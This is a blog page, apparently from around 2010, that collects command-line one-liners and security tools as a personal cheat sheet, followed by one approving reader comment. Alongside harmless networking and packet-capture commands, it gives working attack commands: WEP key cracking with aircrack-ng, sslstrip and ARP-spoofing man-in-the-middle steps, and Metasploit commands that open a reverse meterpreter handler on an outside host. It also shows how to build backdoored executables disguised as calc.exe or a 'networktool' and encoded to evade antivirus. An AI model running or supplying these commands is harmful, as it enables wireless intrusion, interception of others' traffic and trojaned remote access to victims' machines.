one-liners

Random collection of cli one liners & tools – for the times I forget & need prompting again

–ONLINE TOOLS–
IPTools
FastNetTools
GRC Passwords
Robtex
Pingdom – Full Page Test
Site-Perf – Full Page Test
Web Page Analyzer
Webpagetest

Online Scanners (HackerTarget.com)

ExploitDB
GoogleDorks

CIDR NetCalc

–PASSWORD KEEPERS–
LastPass
Keepass (Windows)
KeepassX (MAC)

–PASSWORD HASHES–
http://www.lmcrack.com/

–APP TOOLS–
Portable Apps
HFS (HTTP File Server) – Portable HTTP server for Windows
Maltego
HttpWatch – debug & troubleshoot web page load times

–NETWORKING–
Random MAC:
macchanger -A wlan0
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
airmon-ng stop wlan0
ifconfig wlan0 up
iwconfig wlan0 mode managed
iwconfig wlan0 ap
iwconfig wlan0 channel 11
iwconfig wlan0 essid key
dhclient wlan0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 10.0.1.0/24 -o eth0 -j MASQUERADE
*Vista Interface MTU
To see what interfaces you have on your computer, type
netsh interface ipv4 show subinterfaces
to change the MTU, type
netsh interface ipv4 set subinterface “Local Area Connection” mtu=nnnn store=persistent

–WEP CRACKING–
airmon-ng start wlan0
airodump-ng mon0
*Capture (chan 6, write to capfile, bssid (mac of access point), interface)
airodump-ng -c 6 -w capfile –bssid 00:1D:58:81:A2:54 mon0
*Fake Auth (after setting channel with iwconfig):
aireplay-ng -1 0 -a 00:1D:58:81:A2:54 -h 00:11:22:33:44:55 -e WEPNETWORK mon0
*Force IV packet generation:
aireplay-ng -3 -b 00:1D:58:81:A2:54 -h 00:11:22:33:44:55 mon0
*Crack key after enough IVs (#Data) collected with airodump
aircrack-ng capfile

–NMAP–
root@bt:/usr/bin# cd /usr/share/nmap/scripts/
nmap -sV –script=banner
nmap –script smb-check-vulns.nse -p445 192.168.0.141
sudo nmap -sU -sS -script smb-check-vulns.nse -p U:137,T:139
nmap -script smb-enum-shares.nse -p445
sudo nmap -sU -sS -script smb-enum-shares.nse -p U:137,T:139

nmap -v -p U:1111 -PN -target-
sudo nmap -v -sU -p U:1111 -PN -target-
sudo nmap -v -sU -p U:161 -PN -target-

nmap -sV -p 80 192.168.0.1
nmap -v -A -PN 192.168.2.6
nmap -sP 10.1.1.1-255

–SSLSTRIP–
cd scripts/sslstrip/sslstrip-0.7
iptables -t nat -A PREROUTING -p tcp –destination-port 443 -j REDIRECT –to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
python sslstrip.py -f -w
arpspoof -i eth0 -t

–ETTERCAP–
vi /usr/share/ettercap/etter.dns
etterfilter -o john.ef etter.filter
/etc/etter.conf

–ARPSPOOF–
*Remember to turn on ip forwarding
arpspoof -i wlan0 -t 10.1.1.2 10.1.1.1
arpspoof -i wlan0 -t 10.1.1.1 10.1.1.2

–MISC–
*Generate file for network transfer etc (100MB)
dd if=/dev/zero of=bigfile bs=1024 count=102400

–MSF–
$ msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 8443
msf exploit(handler) > set LHOST metasploit.kicks-ass.net
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] HTTPS listener started on http://metasploit.kicks-ass.net:8443/
[*] Starting the payload handler…

$ msfpayload windows/meterpreter/reverse_https LHOST=metasploit.kicks-ass.net LPORT=8443 R |
msfencode -x calc.exe -t loop-vbs -o final.vbs

root@bt:~# msfpayload windows/meterpreter/reverse_https LHOST=172.16.189.138 LPORT=443 R | msfencode -t exe -x /media/usb/backtrack/clean/calc.exe -k -o ~/networktool.exe -e x86/shikata_ga_nai -c 5
———————————-

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=8443 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5

–STUFF–
Clone a USB drive
dd if=/dev/sdb of=usbdrive.img conv=notrunc
dd if=usbdrive.img of=/dev/sdb conv=notrunc & while killall -USR1 dd; do sleep 5; done

–PACKET CAPTURES–
Top talkers:
tcpdump -tnn -c 20000 -i eth0 | awk -F “.” ‘{print $1″.”$2″.”$3″.”$4}’ | sort | uniq -c | sort -nr | awk ‘ $1 > 100 ‘

tcpdump -tnr PCAPFILE | awk -F ‘.’ ‘{print $1″.”$2″.”$3″.”$4}’ | sort | uniq -c | sort -n | tail -n 5

Advertisements

One response

19 11 2010
sLiPpErYh4x0r

I think this is a good idea, I have the same basic file, a little more detailed… I may throw it up on my site as well.

Keep adding! 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: